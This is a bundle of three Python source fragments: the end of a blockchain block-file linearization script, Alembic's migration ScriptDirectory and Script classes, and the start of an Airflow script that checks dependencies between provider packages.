        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()

    # Force hash byte format setting to be lowercase to make comparisons easier.
    # Also place upfront in case any settings need to know about it.
    if 'rev_hash_bytes' not in settings:
        settings['rev_hash_bytes'] = 'false'
    settings['rev_hash_bytes'] = settings['rev_hash_bytes'].lower()

    # Fill in defaults for any settings the config file did not provide.
    if 'netmagic' not in settings:
        settings['netmagic'] = 'bf0c6bbd'
    if 'genesis' not in settings:
        settings['genesis'] = '00000ffd590b1485b3caadc19b22e6379c733355108f107a430458cdf3407ab6'
    if 'input' not in settings:
        settings['input'] = 'input'
    if 'hashlist' not in settings:
        settings['hashlist'] = 'hashlist.txt'
    if 'file_timestamp' not in settings:
        settings['file_timestamp'] = 0
    if 'split_timestamp' not in settings:
        settings['split_timestamp'] = 0
    if 'max_out_sz' not in settings:
        settings['max_out_sz'] = 1000 * 1000 * 1000
    if 'out_of_order_cache_sz' not in settings:
        settings['out_of_order_cache_sz'] = 100 * 1000 * 1000
    if 'debug_output' not in settings:
        settings['debug_output'] = 'false'

    # Normalize types: config values arrive as strings.
    settings['max_out_sz'] = int(settings['max_out_sz'])
    settings['split_timestamp'] = int(settings['split_timestamp'])
    settings['file_timestamp'] = int(settings['file_timestamp'])
    settings['netmagic'] = unhexlify(settings['netmagic'].encode('utf-8'))
    settings['out_of_order_cache_sz'] = int(settings['out_of_order_cache_sz'])
    settings['debug_output'] = settings['debug_output'].lower()

    if 'output_file' not in settings and 'output' not in settings:
        print("Missing output file / directory")
        sys.exit(1)

    blkindex = get_block_hashes(settings)
    blkmap = mkblockmap(blkindex)

    # Block hash map won't be byte-reversed. Neither should the genesis hash.
    if not settings['genesis'] in blkmap:
        print("Genesis block not found in hashlist")
    else:
        BlockDataCopier(settings, blkindex, blkmap).run()
| |
import datetime
from dateutil import tz
import os
import re
import shutil
from .. import util
from ..util import compat
from . import revision
from ..runtime import migration
from contextlib import contextmanager
# Matches revision files in "sourceless" mode, where compiled .pyc/.pyo
# artifacts may stand in for .py sources; excludes editor lock files (.#...)
# and __init__ modules.
_sourceless_rev_file = re.compile(r'(?!\.\#|__init__)(.*\.py)(c|o)?$')
# Matches only plain .py revision source files (normal, non-sourceless mode).
_only_source_rev_file = re.compile(r'(?!\.\#|__init__)(.*\.py)$')
# Legacy naming scheme: the hex revision id is the filename itself.
_legacy_rev = re.compile(r'([a-f0-9]+)\.py$')
# upgrade_<rev>/downgrade_<rev> function names — presumably the legacy
# module format; not referenced in this chunk (TODO confirm still needed).
_mod_def_re = re.compile(r'(upgrade|downgrade)_([a-z0-9]+)')
# Word runs used to build the filename "slug" from a revision message.
_slug_re = re.compile(r'\w+')
# Default template for generated revision filenames.
_default_file_template = "%(rev)s_%(slug)s"
# Splits config values (e.g. version_locations) on commas and/or spaces.
_split_on_space_comma = re.compile(r',|(?: +)')
class ScriptDirectory(object):
    """Provides operations upon an Alembic script directory.

    This object is useful to get information as to current revisions,
    most notably being able to get at the "head" revision, for schemes
    that want to test if the current revision in the database is the most
    recent::

        from alembic.script import ScriptDirectory
        from alembic.config import Config
        config = Config()
        config.set_main_option("script_location", "myapp:migrations")
        script = ScriptDirectory.from_config(config)
        head_revision = script.get_current_head()
    """

    def __init__(self, dir, file_template=_default_file_template,
                 truncate_slug_length=40,
                 version_locations=None,
                 sourceless=False, output_encoding="utf-8",
                 timezone=None):
        self.dir = dir
        self.file_template = file_template
        self.version_locations = version_locations
        # Fall back to 40 if caller passes 0/None explicitly.
        self.truncate_slug_length = truncate_slug_length or 40
        self.sourceless = sourceless
        self.output_encoding = output_encoding
        # Revisions are loaded lazily by the map via _load_revisions.
        self.revision_map = revision.RevisionMap(self._load_revisions)
        self.timezone = timezone
        if not os.access(dir, os.F_OK):
            raise util.CommandError("Path doesn't exist: %r. Please use "
                                    "the 'init' command to create a new "
                                    "scripts folder." % dir)

    @property
    def versions(self):
        """Return the single version directory, raising if more than one
        version location is configured."""
        loc = self._version_locations
        if len(loc) > 1:
            raise util.CommandError("Multiple version_locations present")
        else:
            return loc[0]

    @util.memoized_property
    def _version_locations(self):
        # Absolute paths of all configured version locations; defaults to
        # the conventional "versions" directory under the script directory.
        if self.version_locations:
            return [
                os.path.abspath(util.coerce_resource_to_filename(location))
                for location in self.version_locations
            ]
        else:
            return (os.path.abspath(os.path.join(self.dir, 'versions')),)

    def _load_revisions(self):
        """Generator of :class:`.Script` objects for every revision file
        found across all version locations, de-duplicated by realpath."""
        if self.version_locations:
            # Only scan locations that actually exist on disk.
            paths = [
                vers for vers in self._version_locations
                if os.path.exists(vers)]
        else:
            paths = [self.versions]
        dupes = set()
        for vers in paths:
            for file_ in Script._list_py_dir(self, vers):
                path = os.path.realpath(os.path.join(vers, file_))
                if path in dupes:
                    util.warn(
                        "File %s loaded twice! ignoring. Please ensure "
                        "version_locations is unique." % path
                    )
                    continue
                dupes.add(path)
                script = Script._from_filename(self, vers, file_)
                if script is None:
                    # Not a revision file (e.g. non-matching filename).
                    continue
                yield script

    @classmethod
    def from_config(cls, config):
        """Produce a new :class:`.ScriptDirectory` given a :class:`.Config`
        instance.

        The :class:`.Config` need only have the ``script_location`` key
        present.
        """
        script_location = config.get_main_option('script_location')
        if script_location is None:
            raise util.CommandError("No 'script_location' key "
                                    "found in configuration.")
        truncate_slug_length = config.get_main_option("truncate_slug_length")
        if truncate_slug_length is not None:
            truncate_slug_length = int(truncate_slug_length)
        version_locations = config.get_main_option("version_locations")
        if version_locations:
            version_locations = _split_on_space_comma.split(version_locations)
        return ScriptDirectory(
            util.coerce_resource_to_filename(script_location),
            file_template=config.get_main_option(
                'file_template',
                _default_file_template),
            truncate_slug_length=truncate_slug_length,
            sourceless=config.get_main_option("sourceless") == "true",
            output_encoding=config.get_main_option("output_encoding", "utf-8"),
            version_locations=version_locations,
            timezone=config.get_main_option("timezone")
        )

    @contextmanager
    def _catch_revision_errors(
            self,
            ancestor=None, multiple_heads=None, start=None, end=None,
            resolution=None):
        """Context manager that converts revision-map errors into
        :class:`.util.CommandError` with user-facing messages.

        Each keyword argument optionally overrides the default message
        for the corresponding error type.
        """
        try:
            yield
        except revision.RangeNotAncestorError as rna:
            if start is None:
                start = rna.lower
            if end is None:
                end = rna.upper
            if not ancestor:
                ancestor = (
                    "Requested range %(start)s:%(end)s does not refer to "
                    "ancestor/descendant revisions along the same branch"
                )
            ancestor = ancestor % {"start": start, "end": end}
            compat.raise_from_cause(util.CommandError(ancestor))
        except revision.MultipleHeads as mh:
            if not multiple_heads:
                multiple_heads = (
                    "Multiple head revisions are present for given "
                    "argument '%(head_arg)s'; please "
                    "specify a specific target revision, "
                    "'<branchname>@%(head_arg)s' to "
                    "narrow to a specific head, or 'heads' for all heads")
            multiple_heads = multiple_heads % {
                "head_arg": end or mh.argument,
                "heads": util.format_as_comma(mh.heads)
            }
            compat.raise_from_cause(util.CommandError(multiple_heads))
        except revision.ResolutionError as re:
            # NOTE: this handler name shadows the module-level ``re`` import
            # within its body.
            if resolution is None:
                resolution = "Can't locate revision identified by '%s'" % (
                    re.argument
                )
            compat.raise_from_cause(util.CommandError(resolution))
        except revision.RevisionError as err:
            compat.raise_from_cause(util.CommandError(err.args[0]))

    def walk_revisions(self, base="base", head="heads"):
        """Iterate through all revisions.

        :param base: the base revision, or "base" to start from the
         empty revision.
        :param head: the head revision; defaults to "heads" to indicate
         all head revisions.  May also be "head" to indicate a single
         head revision.

        .. versionchanged:: 0.7.0 the "head" identifier now refers to
           the head of a non-branched repository only; use "heads" to
           refer to the set of all head branches simultaneously.
        """
        with self._catch_revision_errors(start=base, end=head):
            for rev in self.revision_map.iterate_revisions(
                    head, base, inclusive=True, assert_relative_length=False):
                yield rev

    def get_revisions(self, id_):
        """Return the :class:`.Script` instance with the given rev identifier,
        symbolic name, or sequence of identifiers.

        .. versionadded:: 0.7.0
        """
        with self._catch_revision_errors():
            return self.revision_map.get_revisions(id_)

    def get_all_current(self, id_):
        """Return the given revisions plus all their ancestors, filtered
        down to branch heads."""
        with self._catch_revision_errors():
            top_revs = set(self.revision_map.get_revisions(id_))
            top_revs.update(
                self.revision_map._get_ancestor_nodes(
                    list(top_revs), include_dependencies=True)
            )
            top_revs = self.revision_map._filter_into_branch_heads(top_revs)
            return top_revs

    def get_revision(self, id_):
        """Return the :class:`.Script` instance with the given rev id.

        .. seealso::

            :meth:`.ScriptDirectory.get_revisions`
        """
        with self._catch_revision_errors():
            return self.revision_map.get_revision(id_)

    def as_revision_number(self, id_):
        """Convert a symbolic revision, i.e. 'head' or 'base', into
        an actual revision number."""
        with self._catch_revision_errors():
            rev, branch_name = self.revision_map._resolve_revision_number(id_)
        if not rev:
            # convert () to None
            return None
        else:
            return rev[0]

    def iterate_revisions(self, upper, lower):
        """Iterate through script revisions, starting at the given
        upper revision identifier and ending at the lower.

        The traversal uses strictly the `down_revision`
        marker inside each migration script, so
        it is a requirement that upper >= lower,
        else you'll get nothing back.

        The iterator yields :class:`.Script` objects.

        .. seealso::

            :meth:`.RevisionMap.iterate_revisions`
        """
        return self.revision_map.iterate_revisions(upper, lower)

    def get_current_head(self):
        """Return the current head revision.

        If the script directory has multiple heads
        due to branching, an error is raised;
        :meth:`.ScriptDirectory.get_heads` should be
        preferred.

        :return: a string revision number.

        .. seealso::

            :meth:`.ScriptDirectory.get_heads`
        """
        with self._catch_revision_errors(multiple_heads=(
                'The script directory has multiple heads (due to branching).'
                'Please use get_heads(), or merge the branches using '
                'alembic merge.'
        )):
            return self.revision_map.get_current_head()

    def get_heads(self):
        """Return all "versioned head" revisions as strings.

        This is normally a list of length one,
        unless branches are present.  The
        :meth:`.ScriptDirectory.get_current_head()` method
        can be used normally when a script directory
        has only one head.

        :return: a tuple of string revision numbers.
        """
        return list(self.revision_map.heads)

    def get_base(self):
        """Return the "base" revision as a string.

        This is the revision number of the script that
        has a ``down_revision`` of None.

        If the script directory has multiple bases, an error is raised;
        :meth:`.ScriptDirectory.get_bases` should be
        preferred.
        """
        bases = self.get_bases()
        if len(bases) > 1:
            raise util.CommandError(
                "The script directory has multiple bases. "
                "Please use get_bases().")
        elif bases:
            return bases[0]
        else:
            return None

    def get_bases(self):
        """return all "base" revisions as strings.

        This is the revision number of all scripts that
        have a ``down_revision`` of None.

        .. versionadded:: 0.7.0
        """
        return list(self.revision_map.bases)

    def _upgrade_revs(self, destination, current_rev):
        """Return the list of :class:`.MigrationStep` objects to upgrade
        from ``current_rev`` to ``destination``, in apply order."""
        with self._catch_revision_errors(
                ancestor="Destination %(end)s is not a valid upgrade "
                "target from current head(s)", end=destination):
            revs = self.revision_map.iterate_revisions(
                destination, current_rev, implicit_base=True)
            revs = list(revs)
            # iterate_revisions yields newest-first; upgrades apply
            # oldest-first, hence the reversal.
            return [
                migration.MigrationStep.upgrade_from_script(
                    self.revision_map, script)
                for script in reversed(list(revs))
            ]

    def _downgrade_revs(self, destination, current_rev):
        """Return the list of :class:`.MigrationStep` objects to downgrade
        from ``current_rev`` to ``destination``."""
        with self._catch_revision_errors(
                ancestor="Destination %(end)s is not a valid downgrade "
                "target from current head(s)", end=destination):
            revs = self.revision_map.iterate_revisions(
                current_rev, destination, select_for_downgrade=True)
            return [
                migration.MigrationStep.downgrade_from_script(
                    self.revision_map, script)
                for script in revs
            ]

    def _stamp_revs(self, revision, heads):
        """Return :class:`.StampStep` objects that move the version table
        from ``heads`` to ``revision`` without running migrations."""
        with self._catch_revision_errors(
                multiple_heads="Multiple heads are present; please specify a "
                "single target revision"):
            heads = self.get_revisions(heads)
            # filter for lineage will resolve things like
            # branchname@base, version@base, etc.
            filtered_heads = self.revision_map.filter_for_lineage(
                heads, revision, include_dependencies=True)
            steps = []
            dests = self.get_revisions(revision) or [None]
            for dest in dests:
                if dest is None:
                    # dest is 'base'.  Return a "delete branch" migration
                    # for all applicable heads.
                    steps.extend([
                        migration.StampStep(head.revision, None, False, True,
                                            self.revision_map)
                        for head in filtered_heads
                    ])
                    continue
                elif dest in filtered_heads:
                    # the dest is already in the version table, do nothing.
                    continue
                # figure out if the dest is a descendant or an
                # ancestor of the selected nodes
                descendants = set(
                    self.revision_map._get_descendant_nodes([dest]))
                ancestors = set(self.revision_map._get_ancestor_nodes([dest]))
                if descendants.intersection(filtered_heads):
                    # heads are above the target, so this is a downgrade.
                    # we can treat them as a "merge", single step.
                    assert not ancestors.intersection(filtered_heads)
                    todo_heads = [head.revision for head in filtered_heads]
                    step = migration.StampStep(
                        todo_heads, dest.revision, False, False,
                        self.revision_map)
                    steps.append(step)
                    continue
                elif ancestors.intersection(filtered_heads):
                    # heads are below the target, so this is an upgrade.
                    # we can treat them as a "merge", single step.
                    todo_heads = [head.revision for head in filtered_heads]
                    step = migration.StampStep(
                        todo_heads, dest.revision, True, False,
                        self.revision_map)
                    steps.append(step)
                    continue
                else:
                    # destination is in a branch not represented,
                    # treat it as new branch
                    step = migration.StampStep((), dest.revision, True, True,
                                               self.revision_map)
                    steps.append(step)
                    continue
            return steps

    def run_env(self):
        """Run the script environment.

        This basically runs the ``env.py`` script present
        in the migration environment.   It is called exclusively
        by the command functions in :mod:`alembic.command`.
        """
        util.load_python_file(self.dir, 'env.py')

    @property
    def env_py_location(self):
        # Absolute path of the environment script inside the script dir.
        return os.path.abspath(os.path.join(self.dir, "env.py"))

    def _generate_template(self, src, dest, **kw):
        """Render template ``src`` to ``dest``, reporting status to the user."""
        util.status("Generating %s" % os.path.abspath(dest),
                    util.template_to_file,
                    src,
                    dest,
                    self.output_encoding,
                    **kw
                    )

    def _copy_file(self, src, dest):
        """Copy ``src`` to ``dest``, reporting status to the user."""
        util.status("Generating %s" % os.path.abspath(dest),
                    shutil.copy,
                    src, dest)

    def _ensure_directory(self, path):
        """Create ``path`` (and parents) if it does not already exist."""
        path = os.path.abspath(path)
        if not os.path.exists(path):
            util.status(
                "Creating directory %s" % path,
                os.makedirs, path)

    def _generate_create_date(self):
        """Return the creation timestamp for a new revision file,
        localized to ``self.timezone`` when one is configured."""
        if self.timezone is not None:
            # First, assume correct capitalization
            tzinfo = tz.gettz(self.timezone)
            if tzinfo is None:
                # Fall back to uppercase
                tzinfo = tz.gettz(self.timezone.upper())
            if tzinfo is None:
                raise util.CommandError(
                    "Can't locate timezone: %s" % self.timezone)
            create_date = datetime.datetime.utcnow().replace(
                tzinfo=tz.tzutc()).astimezone(tzinfo)
        else:
            # No timezone configured: naive local time.
            create_date = datetime.datetime.now()
        return create_date

    def generate_revision(
            self, revid, message, head=None,
            refresh=False, splice=False, branch_labels=None,
            version_path=None, depends_on=None, **kw):
        """Generate a new revision file.

        This runs the ``script.py.mako`` template, given
        template arguments, and creates a new file.

        :param revid: String revision id.  Typically this
         comes from ``alembic.util.rev_id()``.
        :param message: the revision message, the one passed
         by the -m argument to the ``revision`` command.
        :param head: the head revision to generate against.  Defaults
         to the current "head" if no branches are present, else raises
         an exception.

         .. versionadded:: 0.7.0

        :param splice: if True, allow the "head" version to not be an
         actual head; otherwise, the selected head must be a head
         (e.g. endpoint) revision.
        :param refresh: deprecated.
        """
        if head is None:
            head = "head"
        try:
            Script.verify_rev_id(revid)
        except revision.RevisionError as err:
            compat.raise_from_cause(util.CommandError(err.args[0]))
        with self._catch_revision_errors(multiple_heads=(
            "Multiple heads are present; please specify the head "
            "revision on which the new revision should be based, "
            "or perform a merge."
        )):
            heads = self.revision_map.get_revisions(head)
        if len(set(heads)) != len(heads):
            raise util.CommandError("Duplicate head revisions specified")
        create_date = self._generate_create_date()
        if version_path is None:
            if len(self._version_locations) > 1:
                # Ambiguous: infer the directory from the first resolvable
                # head, otherwise force the user to pick one.
                for head in heads:
                    if head is not None:
                        version_path = os.path.dirname(head.path)
                        break
                else:
                    raise util.CommandError(
                        "Multiple version locations present, "
                        "please specify --version-path")
            else:
                version_path = self.versions
        norm_path = os.path.normpath(os.path.abspath(version_path))
        for vers_path in self._version_locations:
            if os.path.normpath(vers_path) == norm_path:
                break
        else:
            raise util.CommandError(
                "Path %s is not represented in current "
                "version locations" % version_path)
        if self.version_locations:
            self._ensure_directory(version_path)
        path = self._rev_path(version_path, revid, message, create_date)
        if not splice:
            for head in heads:
                if head is not None and not head.is_head:
                    raise util.CommandError(
                        "Revision %s is not a head revision; please specify "
                        "--splice to create a new branch from this revision"
                        % head.revision)
        if depends_on:
            with self._catch_revision_errors():
                depends_on = [
                    dep
                    if dep in rev.branch_labels  # maintain branch labels
                    else rev.revision  # resolve partial revision identifiers
                    for rev, dep in [
                        (self.revision_map.get_revision(dep), dep)
                        for dep in util.to_list(depends_on)
                    ]
                ]
        self._generate_template(
            os.path.join(self.dir, "script.py.mako"),
            path,
            up_revision=str(revid),
            down_revision=revision.tuple_rev_as_scalar(
                tuple(h.revision if h is not None else None for h in heads)),
            branch_labels=util.to_tuple(branch_labels),
            depends_on=revision.tuple_rev_as_scalar(depends_on),
            create_date=create_date,
            comma=util.format_as_comma,
            message=message if message is not None else ("empty message"),
            **kw
        )
        try:
            script = Script._from_path(self, path)
        except revision.RevisionError as err:
            compat.raise_from_cause(util.CommandError(err.args[0]))
        if branch_labels and not script.branch_labels:
            raise util.CommandError(
                "Version %s specified branch_labels %s, however the "
                "migration file %s does not have them; have you upgraded "
                "your script.py.mako to include the "
                "'branch_labels' section?" % (
                    script.revision, branch_labels, script.path
                ))
        self.revision_map.add_revision(script)
        return script

    def _rev_path(self, path, rev_id, message, create_date):
        """Build the filesystem path for a new revision file, rendering
        ``self.file_template`` with the rev id, message slug and
        create-date components."""
        slug = "_".join(_slug_re.findall(message or "")).lower()
        if len(slug) > self.truncate_slug_length:
            # Truncate on a word boundary and mark the cut with a trailing _.
            slug = slug[:self.truncate_slug_length].rsplit('_', 1)[0] + '_'
        filename = "%s.py" % (
            self.file_template % {
                'rev': rev_id,
                'slug': slug,
                'year': create_date.year,
                'month': create_date.month,
                'day': create_date.day,
                'hour': create_date.hour,
                'minute': create_date.minute,
                'second': create_date.second
            }
        )
        return os.path.join(path, filename)
class Script(revision.Revision):
    """Represent a single revision file in a ``versions/`` directory.

    The :class:`.Script` instance is returned by methods
    such as :meth:`.ScriptDirectory.iterate_revisions`.
    """

    def __init__(self, module, rev_id, path):
        self.module = module
        self.path = path
        # Branch labels / dependencies are optional module attributes;
        # normalize them to tuples for the base Revision.
        super(Script, self).__init__(
            rev_id,
            module.down_revision,
            branch_labels=util.to_tuple(
                getattr(module, 'branch_labels', None), default=()),
            dependencies=util.to_tuple(
                getattr(module, 'depends_on', None), default=())
        )

    module = None
    """The Python module representing the actual script itself."""

    path = None
    """Filesystem path of the script."""

    @property
    def doc(self):
        """Return the docstring given in the script."""
        # First paragraph only (text up to the first blank line).
        return re.split("\n\n", self.longdoc)[0]

    @property
    def longdoc(self):
        """Return the docstring given in the script."""
        doc = self.module.__doc__
        if doc:
            if hasattr(self.module, "_alembic_source_encoding"):
                # Python 2 sourceless case: decode bytes docstring.
                doc = doc.decode(self.module._alembic_source_encoding)
            return doc.strip()
        else:
            return ""

    @property
    def log_entry(self):
        """Return a multi-line human-readable description of this revision,
        as used by verbose history/log output."""
        entry = "Rev: %s%s%s%s\n" % (
            self.revision,
            " (head)" if self.is_head else "",
            " (branchpoint)" if self.is_branch_point else "",
            " (mergepoint)" if self.is_merge_point else "",
        )
        if self.is_merge_point:
            entry += "Merges: %s\n" % (self._format_down_revision(), )
        else:
            entry += "Parent: %s\n" % (self._format_down_revision(), )
        if self.dependencies:
            entry += "Also depends on: %s\n" % (
                util.format_as_comma(self.dependencies))
        if self.is_branch_point:
            entry += "Branches into: %s\n" % (
                util.format_as_comma(self.nextrev))
        if self.branch_labels:
            entry += "Branch names: %s\n" % (
                util.format_as_comma(self.branch_labels), )
        entry += "Path: %s\n" % (self.path,)
        entry += "\n%s\n" % (
            "\n".join(
                "    %s" % para
                for para in self.longdoc.splitlines()
            )
        )
        return entry

    def __str__(self):
        return "%s -> %s%s%s%s, %s" % (
            self._format_down_revision(),
            self.revision,
            " (head)" if self.is_head else "",
            " (branchpoint)" if self.is_branch_point else "",
            " (mergepoint)" if self.is_merge_point else "",
            self.doc)

    def _head_only(
            self, include_branches=False, include_doc=False,
            include_parents=False, tree_indicators=True,
            head_indicators=True):
        """Return a one-line description of this revision, with optional
        parent, branch, head/tree indicator and docstring segments."""
        text = self.revision
        if include_parents:
            if self.dependencies:
                text = "%s (%s) -> %s" % (
                    self._format_down_revision(),
                    util.format_as_comma(self.dependencies),
                    text
                )
            else:
                text = "%s -> %s" % (
                    self._format_down_revision(), text)
        if include_branches and self.branch_labels:
            text += " (%s)" % util.format_as_comma(self.branch_labels)
        if head_indicators or tree_indicators:
            text += "%s%s" % (
                " (head)" if self._is_real_head else "",
                " (effective head)" if self.is_head and
                not self._is_real_head else ""
            )
        if tree_indicators:
            text += "%s%s" % (
                " (branchpoint)" if self.is_branch_point else "",
                " (mergepoint)" if self.is_merge_point else ""
            )
        if include_doc:
            text += ", %s" % self.doc
        return text

    def cmd_format(
            self,
            verbose,
            include_branches=False, include_doc=False,
            include_parents=False, tree_indicators=True):
        """Format this revision for command-line output: the full log
        entry when ``verbose``, else the one-line form."""
        if verbose:
            return self.log_entry
        else:
            return self._head_only(
                include_branches, include_doc,
                include_parents, tree_indicators)

    def _format_down_revision(self):
        # "<base>" marks a revision with no parent.
        if not self.down_revision:
            return "<base>"
        else:
            return util.format_as_comma(self._versioned_down_revisions)

    @classmethod
    def _from_path(cls, scriptdir, path):
        """Construct a Script from a full filesystem path."""
        dir_, filename = os.path.split(path)
        return cls._from_filename(scriptdir, dir_, filename)

    @classmethod
    def _list_py_dir(cls, scriptdir, path):
        """List candidate revision filenames in ``path``, including
        ``__pycache__`` entries when running in sourceless mode."""
        if scriptdir.sourceless:
            # read files in version path, e.g. pyc or pyo files
            # in the immediate path
            paths = os.listdir(path)
            names = set(fname.split(".")[0] for fname in paths)
            # look for __pycache__
            if os.path.exists(os.path.join(path, '__pycache__')):
                # add all files from __pycache__ whose filename is not
                # already in the names we got from the version directory.
                # add as relative paths including __pycache__ token
                paths.extend(
                    os.path.join('__pycache__', pyc)
                    for pyc in os.listdir(os.path.join(path, '__pycache__'))
                    if pyc.split(".")[0] not in names
                )
            return paths
        else:
            return os.listdir(path)

    @classmethod
    def _from_filename(cls, scriptdir, dir_, filename):
        """Load the module in ``dir_/filename`` and build a Script from it,
        or return None when the filename is not a revision file."""
        if scriptdir.sourceless:
            py_match = _sourceless_rev_file.match(filename)
        else:
            py_match = _only_source_rev_file.match(filename)
        if not py_match:
            return None
        py_filename = py_match.group(1)
        if scriptdir.sourceless:
            is_c = py_match.group(2) == 'c'
            is_o = py_match.group(2) == 'o'
        else:
            is_c = is_o = False
        if is_o or is_c:
            py_exists = os.path.exists(os.path.join(dir_, py_filename))
            pyc_exists = os.path.exists(os.path.join(dir_, py_filename + "c"))
            # prefer .py over .pyc because we'd like to get the
            # source encoding; prefer .pyc over .pyo because we'd like to
            # have the docstrings which a -OO file would not have
            if py_exists or is_o and pyc_exists:
                return None
        module = util.load_python_file(dir_, filename)
        if not hasattr(module, "revision"):
            # attempt to get the revision id from the script name,
            # this for legacy only
            m = _legacy_rev.match(filename)
            if not m:
                raise util.CommandError(
                    "Could not determine revision id from filename %s. "
                    "Be sure the 'revision' variable is "
                    "declared inside the script (please see 'Upgrading "
                    "from Alembic 0.1 to 0.2' in the documentation)."
                    % filename)
            else:
                revision = m.group(1)
        else:
            revision = module.revision
        return Script(module, revision, os.path.join(dir_, filename))
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import json
import os
import sys
from ast import Import, ImportFrom, NodeVisitor, parse
from collections import defaultdict
from os.path import dirname, sep
from typing import Dict, List, Optional
from setup import PROVIDERS_REQUIREMENTS
sys.path.append(os.path.join(dirname(__file__), os.pardir))
# Path prefixes (OS-specific separator) identifying provider source and
# provider test files.
AIRFLOW_PROVIDERS_FILE_PREFIX = "airflow" + sep + "providers" + sep
AIRFLOW_TESTS_PROVIDERS_FILE_PREFIX = "tests" + sep + "providers" + sep
# Dotted-module prefix identifying provider imports.
AIRFLOW_PROVIDERS_IMPORT_PREFIX = "airflow.providers."
# List of information messages generated
infos: List[str] = []
# List of warnings generated
warnings: List[str] = []
# list of errors generated
errors: List[str] = []
# store dependencies: provider name -> providers it imports from
dependencies: Dict[str, List[str]] = defaultdict(list)
def find_provider(provider_elements: List[str]) -> Optional[str]:
    """
    Finds provider name from the list of elements provided. It looks the providers up
    in PROVIDERS_REQUIREMENTS map taken from the provider's package setup.

    :param provider_elements: array of elements of the path (split)
    :return: provider name or None if no provider could be found
    """
    accumulated: List[str] = []
    for element in provider_elements:
        # Grow the dotted candidate one path element at a time and check
        # whether it names a known provider.
        accumulated.append(element)
        candidate = ".".join(accumulated)
        if candidate in PROVIDERS_REQUIREMENTS:
            return candidate
    return None
def get_provider_from_file_name(file_name: str) -> Optional[str]:
    """
    Retrieves provider name from file name

    :param file_name: name of the file
    :return: provider name or None if no provider could be found
    """
    is_provider_file = (
        AIRFLOW_PROVIDERS_FILE_PREFIX in file_name
        or AIRFLOW_TESTS_PROVIDERS_FILE_PREFIX in file_name
    )
    if not is_provider_file:
        # We should only check file that are provider
        errors.append(f"Wrong file not in the providers package = {file_name}")
        return None
    # Drop the leading "airflow/providers" (or "tests/providers") elements.
    path_elements = get_file_suffix(file_name).split(sep)[2:]
    provider = find_provider(path_elements)
    if not provider:
        if file_name.endswith("__init__.py"):
            infos.append(f"Skipped file = {file_name}")
        else:
            warnings.append(f"Provider not found for path = {file_name}")
    return provider
def get_file_suffix(file_name):
    """Return the tail of *file_name* starting at the providers path prefix,
    or None if the name contains no providers prefix."""
    for prefix in (AIRFLOW_PROVIDERS_FILE_PREFIX,
                   AIRFLOW_TESTS_PROVIDERS_FILE_PREFIX):
        if prefix in file_name:
            return file_name[file_name.find(prefix):]
    return None
def get_provider_from_import(import_name: str) -> Optional[str]:
    """
    Retrieves provider name from an import statement's dotted name.

    :param import_name: name of the import
    :return: provider name or None if no provider could be found
    """
    prefix_position = import_name.find(AIRFLOW_PROVIDERS_IMPORT_PREFIX)
    if prefix_position == -1:
        # skip silently - we expect non-providers imports
        return None
    # Drop the leading "airflow.providers" elements from the dotted path.
    import_elements = import_name[prefix_position:].split(".")[2:]
    provider = find_provider(import_elements)
    if not provider:
        warnings.append(f"Provider not found for import = {import_name}")
    return provider
class ImportFinder(NodeVisitor):
    """
    AST visitor that collects all imported names in its imports.

    After :meth:`visit` is called on a parsed module, the fully qualified
    names of every import are available in ``self.imports``.
    """
    def __init__(self, filename):
        # Fully qualified names of all imports found so far.
        self.imports: List[str] = []
        self.filename = filename
        # BUG FIX: this previously assigned the typing object ``List[str]``
        # itself instead of an empty list.
        self.handled_import_exception: List[str] = []
        self.tried_imports: List[str] = []
    def process_import(self, import_name: str):
        """Record a single fully qualified import name."""
        self.imports.append(import_name)
    # noinspection PyMethodMayBeStatic
    def get_import_name_from_import_from(self, node: ImportFrom) -> List[str]:
        """
        Retrieves import name from the "from" import.
        :param node: ImportFrom name
        :return: import name
        """
        # node.module is None for relative imports like ``from . import x``.
        return [
            '%s.%s' % (node.module, alias.name) if node.module else alias.name
            for alias in node.names
        ]
    # noinspection PyPep8Naming
    def visit_Import(self, node: Import):  # pylint: disable=invalid-name
        for alias in node.names:
            self.process_import(alias.name)
    # noinspection PyPep8Naming
    def visit_ImportFrom(self, node: ImportFrom):  # pylint: disable=invalid-name
        if node.module == '__future__':
            # __future__ imports are compiler directives, not dependencies.
            return
        for fullname in self.get_import_name_from_import_from(node):
            self.process_import(fullname)
def get_imports_from_file(file_name: str) -> List[str]:
    """
    Retrieves imports from file.

    :param file_name: name of the file
    :return: list of import names
    """
    try:
        with io.open(file_name, "rt", encoding="utf-8") as source_file:
            tree = parse(source_file.read(), file_name)
    except Exception:
        # Re-raise after pointing at the offending file on stderr.
        print(f"Error when opening file {file_name}", file=sys.stderr)
        raise
    collector = ImportFinder(file_name)
    collector.visit(tree)
    return collector.imports
def check_if_different_provider_used(file_name: str):
    """Record in ``dependencies`` every import in *file_name* that targets
    a provider different from the file's own provider."""
    file_provider = get_provider_from_file_name(file_name)
    if not file_provider:
        return
    for import_name in get_imports_from_file(file_name):
        import_provider = get_provider_from_import(import_name)
        if import_provider and import_provider != file_provider:
            dependencies[file_provider].append(import_provider)
def parse_arguments():
    """Parse command-line arguments.

    Exits with status 2 (after printing usage) when no files are given.

    :return: tuple of (files, provider_dependencies_file, documentation_file)
    """
    import argparse
    parser = argparse.ArgumentParser(
        description='Checks if dependencies between packages are handled correctly.')
    parser.add_argument("-f", "--provider-dependencies-file",
                        help="Stores dependencies between providers in the file")
    parser.add_argument("-d", "--documentation-file",
                        help="Updates package documentation in the file specified (.rst)")
    parser.add_argument('files', nargs='*')
    parsed = parser.parse_args()
    if not parsed.files:
        parser.print_usage()
        print()
        sys.exit(2)
    return (parsed.files,
            parsed.provider_dependencies_file,
            parsed.documentation_file)
# Indentation prefix for printed info/warning/error lines.
PREFIX = " "
# RST table header inserted into the documentation file.
HEADER = """
========================== ===========================
Package Extras
========================== ===========================
"""
# RST table footer closing the generated dependency table.
FOOTER = """========================== ===========================
"""
